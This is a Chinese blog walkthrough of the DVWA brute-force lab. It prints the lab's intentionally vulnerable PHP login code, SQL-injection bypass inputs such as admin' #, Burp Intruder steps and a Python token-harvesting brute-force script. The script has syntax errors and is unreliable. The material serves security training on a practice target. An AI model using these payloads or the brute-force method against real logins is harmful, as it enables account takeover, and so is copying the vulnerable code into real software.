DVWA-Brute Force(暴力破解)

最新推荐文章于 2024-04-04 22:46:44 发布
最新推荐文章于 2024-04-04 22:46:44 发布
阅读量722 收藏 3
点赞数 4
分类专栏: DVWA与sqli-lab
原文链接:https://www.freebuf.com/articles/web/116437.html
版权

DVWA-Brute Force(暴力破解)

Brute Force
Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一,如2014年轰动全国的12306“撞库”事件,实质就是暴力破解攻击。

在这里插入图片描述
LOW级别
源代码如下:

<?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Get username
    $user = $_GET[ 'username' ];

    // Get password
    $pass = $_GET[ 'password' ];
    $pass = md5( $pass );

    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    if( $result && mysql_num_rows( $result ) == 1 ) {
        // Get users details
        $avatar = mysql_result( $result, 0, "avatar" );

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    mysql_close();
}

?>

可以看到,服务器只是验证了参数Login是否被设置(isset函数在php中用来检测变量是否设置,该函数返回的是布尔类型的值,即true/false),没有任何的防爆破机制,且对参数username、password没有做任何过滤,存在明显的sql注入漏洞。

实测

方法一burpsuite
设置好代理,burp走起

第一步抓包
在这里插入图片描述
第二步右击发送给intrude模块或者Ctrl+I,因为要对password那个进行破解,所以,要清除全部“§”符号,为password参数添加"§"
在这里插入图片描述
第三步选择“payload”选项进行暴力破解,载入字典文件

在这里插入图片描述
第四步看到有一行与其他响应长度不同,可以推测为正确的密码
在这里插入图片描述
登录试一下
在这里插入图片描述
方法二手工注入
username:admin’ or’ 1’=’ 1
password:(空)
在这里插入图片描述
username:admin’ #
password:(空)
在这里插入图片描述
Medium级别

<?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = mysql_real_escape_string( $user );

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = mysql_real_escape_string( $pass );
    $pass = md5( $pass );

    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    if( $result && mysql_num_rows( $result ) == 1 ) {
        // Get users details
        $avatar = mysql_result( $result, 0, "avatar" );

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( 2 );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    mysql_close();
}

?>

相比Low级别的代码,Medium级别的代码主要增加了mysql_real_escape_string函数,这个函数会对字符串中的特殊符号(x00,n,r,,’,”,x1a)进行转义,基本上能够抵御sql注入攻击,说基本上是因为查到说 MySQL5.5.37以下版本如果设置编码为GBK,能够构造编码绕过mysql_real_escape_string 对单引号的转义(因实验环境的MySQL版本较新,所以并未做相应验证);同时,$pass做了MD5校验,杜绝了通过参数password进行sql注入的可能性。但是,依然没有加入有效的防爆破机制(sleep(2)实在算不上)。

同low级别一样使用同样的爆破方式

high级别
源代码如下:

 <?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = stripslashes( $user );
    $user = mysql_real_escape_string( $user );

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = mysql_real_escape_string( $pass );
    $pass = md5( $pass );

    // Check database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    if( $result && mysql_num_rows( $result ) == 1 ) {
        // Get users details
        $avatar = mysql_result( $result, 0, "avatar" );

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( rand( 0, 3 ) );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    mysql_close();
}

// Generate Anti-CSRF token
generateSessionToken();

?>

High级别的代码加入了Token,可以抵御CSRF攻击,同时也增加了爆破的难度,通过抓包,可以看到,登录验证时提交了四个参数:username、password、Login以及user_token。
在这里插入图片描述
每次服务器返回的登陆页面中都会包含一个随机的user_token的值,用户每次登录时都要将user_token一起提交。服务器收到请求后,会优先做token的检查,再进行sql查询。
在这里插入图片描述
同时,High级别的代码中,使用了stripslashes(去除字符串中的反斜线字符,如果有两个连续的反斜线,则只去掉一个)、 mysql_real_escape_string对参数username、password进行过滤、转义,进一步抵御sql注入。

这里用来自大佬的脚本

from bs4 import BeautifulSoup
import urllib2
header={       'Host': '192.168.x.x',
		'Cache-Control': 'max-age=0',
		'If-None-Match': "307-52156c6a290c0",
		'If-Modified-Since': 'Mon, 05 Oct 2015 07:51:07 GMT',
		'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36',
		'Accept': '*/*',
		'Referer': 'http://192.168.x.x/dvwa/vulnerabilities/brute/index.php',
		'Accept-Encoding': 'gzip, deflate, sdch',
		'Accept-Language': 'zh-CN,zh;q=0.8',
		'Cookie': 'security=high; PHPSESSID=xxxxxxxxxxxxxxxxxx'}
requrl = "http://192.168.x.x/dvwa/vulnerabilities/brute/"

def get_token(requrl,header)
	req = urllib2.Request(url=requrl,headers=header)
	response = urllib2.urlopen(req)
	print response.getcode(),
	the_page = response.read()
	print len(the_page)
	soup = BeautifulSoup(the_page,html.parser)
	user_token = soup.form.input.input.input.input[value] #get the user_token
	return user_token

user_token = get_token(requrl,header)
i=0
for line in open(rkolin.txt)
	requrl = "http://192.168.x.x/dvwa/vulnerabilities/brute/"+"?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token
	i = i+1
	print i,'admin',line.strip(),
	user_token = get_token(requrl,header)
	if (i == 10)
		break

运行脚本时burpsuite截图
在这里插入图片描述
打印的结果从第二行开始依次是序号、用户名、密码、http状态码以及返回的页面长度。

在这里插入图片描述
对比结果看到,密码为password时返回的长度不太一样,手工验证,登录成功,爆破完成。
方法二burpsuite
第一步
将拦截结果发送给intrude
在这里插入图片描述
在这里插入图片描述
第二步
设置两个参数 password和user_token为变量,攻击类型选择pitchfork,意思是草叉模式(Pitchfork )——它可以使用多组Payload集合,在每一个不同的Payload标志位置上(最多20个),遍历所有的Payload。举例来说,如果有两个Payload标志位置,第一个Payload值为A和B,第二个Payload值为C和D,则发起攻击时,将共发起两次攻击,第一次使用的Payload分别为A和C,第二次使用的Payload分别为B和D。
在这里插入图片描述

第三步
设置参数,在option选项卡中将攻击线程thread设置为1,因为Recursive_Grep模式不支持多线程攻击,然后选择Grep-Extract,意思是用于提取响应消息中的有用信息,点击Add,如下图进行设置,最后将Redirections设置为Always
在这里插入图片描述
在这里插入图片描述
第四步
然后设置payload,第一个参数设置不在赘述,第二个参数选择Recursive grep,然后将options中的token作为第一次请求的初始值。

在这里插入图片描述
在这里插入图片描述
第五步点击start attack攻击爆破,结果成功爆破,如下图所示
在这里插入图片描述

参考转自:https://www.freebuf.com/articles/web/116437.html

参考转自:https://blog.csdn.net/liweibin812/article/details/86287645

bye_X
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA靶场-中级难度
ljlrookiebird的博客
07-31 1036
网络安全 - DVWA靶场
DVWA靶场-Brute Force暴力破解~保姆级教程!!!
2301_77360738的博客
05-09 2576
DVWA靶场初体验,超简单的暴力破解!!!
DVWA——暴力破解
m0_74426634的博客
04-04 1938
概述:穷举法是一种针对于密码的破译方法。这种方法很像数学上的“完全归纳法”并在密码破译方面得到了广泛的应用。简单来说就是将密码进行逐个推算直到找出真正的密码为止。比如一个四位并且全部由数字组成其密码共有10000种组合,也就是说最多我们会尝试9999次才能找到真正的密码。利用这种方法我们可以运用计算机来进行逐个推算,也就是说用我们破解任何一个密码也都只是一个时间问题。
DVWA-暴力破解
qq_60848021的博客
06-26 707
说明账号是admin 密码是password2,暴力破解扩展:hydra(九头蛇)支持的协议:命令参数:刚开始用Win10 尝试使用SMB协议攻破登录密码,一直出现后来使用namp扫了下发现445端口并没有打开,后来使用Win2008做实验,小插曲:user.txt和pass.txt放在桌面上不能直接使用,需要写路径,直接放到主文件夹里面直接指定就行了,不需要写路径。重点:要先用namp扫一下对应的端口有没有打开!!!...
DVWA--暴力破解等级演练(亲测)
weixin_44034479的博客
07-07 1514
暴力破解 原理: 使用攻击者自己的用户名和密码字典,一个一个去枚举,尝试是否能够登录。 实施暴力破解之前,我们只需要先去获取构造HTTP包所需要的参数,然后扔给暴力破解软件构造工具数据包,然后实施攻击就可以了。 软件: burp suite 低级 具备字典:用户名和密码。记事本记录 步骤 提交正确的用户名和错误密码,会显示界面报错,进行抓包,会看到我们输入的用户名和密码。 右键send to lntruder,并且点开lntruder—positions—clear:清除变量。 选中输入的用户名和密码
DVWA-Brute Force @ Burpsuite.docx
06-27
DVWA-Brute Force @ Burpsuite.docx
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
DVWA-master.7z 压缩包
09-14
这个"DVWA-master.7z"压缩包包含了完整的DVWA源代码和其他相关文件,用于在本地环境中搭建一个模拟的脆弱Web应用。 为了正确地使用这个压缩包,首先你需要下载它并使用解压缩工具(如7-Zip)将其解压。解压缩后,你...
DVWA_bruteForce工具_官网下载_Bruter_1.1.zip
09-18
DVWABruteForce板块所需要用到的暴力破解工具。 日常暴力破解小能手。谁用谁知道。
实验1-DVWA部署暴力破解.docx
01-05
利用Kali Linux对DVWABrute Force模块展开实验,包括: 1) Low等级、Medium等级的手工破解、自动化破解;(40分) 2) High等级的自己撰写工具自动化破解;(40分) 3) Impossible等级的机制以及修复、防御暴力破解...
DVWA-暴力破解Brute Force
weixin_58954236的博客
08-19 1162
首先访问有user token的页面,bp拦截到当前页面链接使用宏配置,正则表达过滤user token,输入账号密码拦截,将拦截的内容先放到重发器里面测试一下,user token是否会变,如果变了,表面之前的宏设置成功首先访问有user token的页面,bp拦截到当前页面链接使用宏配置,正则表达过滤user token,输入账号密码拦截,将拦截的内容先放到重发器里面测试一下,user token是否会变,如果变了,表面之前的宏设置成功。
DVWA------Brute Force暴力破解
m0_65712192的博客
11-09 1071
DVWA靶场之Brute Force暴力破解
【小白靶场学习】DVWA靶场篇——Burte Force暴力破解
u013569931的博客
11-07 2125
人菜瘾还大的小白靶场修真路
DVWA暴力破解攻击(Brute Force
弱弱的小雨鸟
01-14 1万+
暴力破解Brute Force)的意思是攻击者借助计算机的高速计算不停枚举所有可能的用户名和密码,直到尝试出正确的组合,成功登录系统。理论上,只要字典足够大,破解总是会成功的。阻止暴力破解的最有效方式是设置复杂的密码(英文字母大小写、数字、符号混合)。而如果你的字典是从某网站泄露出来的,你使用它试图登陆其他网站,就便是撞库。撞库攻击的成功率高于暴力破解,因为你在A网站的用户名、密码通常和B网站的
DVWA暴力破解Brute_Force High级别)
liweibin812的博客
01-11 1万+
DVWA调至high级别,发现用之前的暴力破解就不好使了,因为其使用了随机token机制来防止CSRF,从而在一定程度上防止了重放攻击,增加了爆破难度。但是依然可以使用burpsuite来爆破。 1. 将登录请求进行拦截,发现增加了user_token参数,所以爆破要选择两个参数来进行,先将请求发送到intruder。 2. 设置两个参数 password和user_token为变量,攻...
pikachu靶场之暴力破解
qq_51902218的博客
07-16 3272
pikachu靶场暴力破解,web安全
DVWABrute Force
baynk的博客
08-22 2602
Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令。 下面将对四种级别的代码进行分析。 Low 服务器端核心代码 <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $p...
DVWABrute Force(暴力破解)
热门推荐
谢公子的博客
10-04 1万+
目录 Low Medium High Impossible 暴力破解是指使用穷举法,举出所有的可能的结果,然后逐一验证是否正确! Low 源代码: &lt;?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password ...
dvwa通关brute force
最新发布
06-08
DVWA中,Brute Force挑战是关于用户登录部分的一个环节,主要是测试用户的密码暴力破解能力。 当你遇到Brute Force关卡时,目标是尝试使用各种可能的用户名和密码组合,直到找到正确的登录凭证。这通常涉及到编写...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值